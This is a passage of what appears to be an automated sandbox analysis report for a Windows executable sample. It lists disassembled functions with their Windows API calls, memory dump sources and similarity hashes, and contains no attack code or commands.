                                                            Function 00441672 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                            • GetWindowRect.USER32(?,?), ref: 00441722
                                                            • PtInRect.USER32(?,?,?), ref: 00441734
                                                            • MessageBeep.USER32(00000000), ref: 004417AD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                            • String ID:
                                                            • API String ID: 1352109105-0
                                                            • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                            • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                            • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                            • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                            Function 0045D1AF Relevance: 6.1, APIs: 4, Instructions: 103fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                            • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                            • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                            • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                            • String ID:
                                                            • API String ID: 3321077145-0
                                                            • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                            • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                            • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                            • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                            Function 0042083F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                            • __isleadbyte_l.LIBCMT ref: 004208A6
                                                            • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                            • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                            • String ID:
                                                            • API String ID: 3058430110-0
                                                            • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                            • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                            • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                            • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                            Function 0045039B Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetParent.USER32(?), ref: 004503C8
                                                            • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                            • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                            • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Proc$Parent
                                                            • String ID:
                                                            • API String ID: 2351499541-0
                                                            • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                            • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                            • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                            • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                            Function 00442A83 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                            • TranslateMessage.USER32(?), ref: 00442B01
                                                            • DispatchMessageW.USER32(?), ref: 00442B0B
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Message$Peek$DispatchTranslate
                                                            • String ID:
                                                            • API String ID: 1795658109-0
                                                            • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                            • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                            • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                            • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                            Function 0047438B Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                              • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                              • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                              • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                            • GetCaretPos.USER32(?), ref: 004743B2
                                                            • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                            • GetForegroundWindow.USER32 ref: 004743EE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                            • String ID:
                                                            • API String ID: 2759813231-0
                                                            • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                            • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                            • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                            • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                            Function 004494A5 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                            • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                            • _wcslen.LIBCMT ref: 00449519
                                                            • _wcslen.LIBCMT ref: 00449526
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageSend_wcslen$_wcspbrk
                                                            • String ID:
                                                            • API String ID: 2886238975-0
                                                            • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                            • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                            • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                            • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                            Function 0046888B Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: __setmode$DebugOutputString_fprintf
                                                            • String ID:
                                                            • API String ID: 1792727568-0
                                                            • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                            • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                            • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                            • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                            Function 0047A26A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Window$Long$AttributesLayered
                                                            • String ID:
                                                            • API String ID: 2169480361-0
                                                            • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                            • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                            • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                            • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                            Function 00434CC9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 75stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                              • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                              • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                            • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                            • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                            • String ID: cdecl
                                                            • API String ID: 3850814276-3896280584
                                                            • Opcode ID: c1d0e3fd88ced86f6f3832065c3908be80ab03c979ff4d6bcf24e5a7885ffd19
                                                            • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                            • Opcode Fuzzy Hash: c1d0e3fd88ced86f6f3832065c3908be80ab03c979ff4d6bcf24e5a7885ffd19
                                                            • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                            Function 0046D402 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                            • gethostbyname.WSOCK32(?), ref: 0046D42D
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                            • _memmove.LIBCMT ref: 0046D475
                                                            • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                            • String ID:
                                                            • API String ID: 2502553879-0
                                                            • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                            • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                            • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                            • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                            Function 00448C3C Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32 ref: 00448C69
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                            • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                            • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$LongWindow
                                                            • String ID:
                                                            • API String ID: 312131281-0
                                                            • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                            • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                            • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                            • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                            Function 00458A61 Relevance: 6.1, APIs: 4, Instructions: 71networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                            • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                            • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastacceptselect
                                                            • String ID:
                                                            • API String ID: 385091864-0
                                                            • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                            • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                            • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                            • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                            Function 004368A0 Relevance: 6.1, APIs: 4, Instructions: 69windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                            • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                            • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
